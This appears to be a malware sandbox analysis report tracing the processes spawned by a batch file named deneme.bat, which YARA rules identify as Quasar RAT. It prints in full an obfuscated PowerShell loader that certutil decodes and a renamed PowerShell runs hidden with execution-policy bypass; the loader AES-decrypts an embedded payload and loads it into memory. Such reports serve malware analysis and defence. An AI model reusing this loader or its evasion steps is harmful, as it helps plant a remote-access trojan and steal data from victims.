
                            General

                            Target ID:0
                            Start time:09:34:49
                            Start date:28/05/2023
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
                            Imagebase:0x7ff707bb0000
                            File size:273920 bytes
                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:1
                            Start time:09:34:50
                            Start date:28/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Target ID:2
                            Start time:09:34:50
                            Start date:28/05/2023
                            Path:C:\Windows\System32\mode.com
                            Wow64 process (32bit):false
                            Commandline:Mode 60,3
                            Imagebase:0x7ff6c3520000
                            File size:31232 bytes
                            MD5 hash:1A3D2D975EB4A5AF22768F1E23C9A83C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Target ID:3
                            Start time:09:34:50
                            Start date:28/05/2023
                            Path:C:\Windows\System32\certutil.exe
                            Wow64 process (32bit):false
                            Commandline:CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
                            Imagebase:0x7ff70d710000
                            File size:1557504 bytes
                            MD5 hash:EB199893441CED4BBBCB547FE411CF2D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Target ID:4
                            Start time:09:34:52
                            Start date:28/05/2023
                            Path:C:\Users\user\AppData\Local\Temp\allah.bat.exe
                            Wow64 process (32bit):false
                            Commandline:"allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
                            Imagebase:0x7ff7eb5b0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                            • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekshen
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            • Detection: 0%, Virustotal, Browse
                            Reputation:high

                            Disassembly

                            No disassembly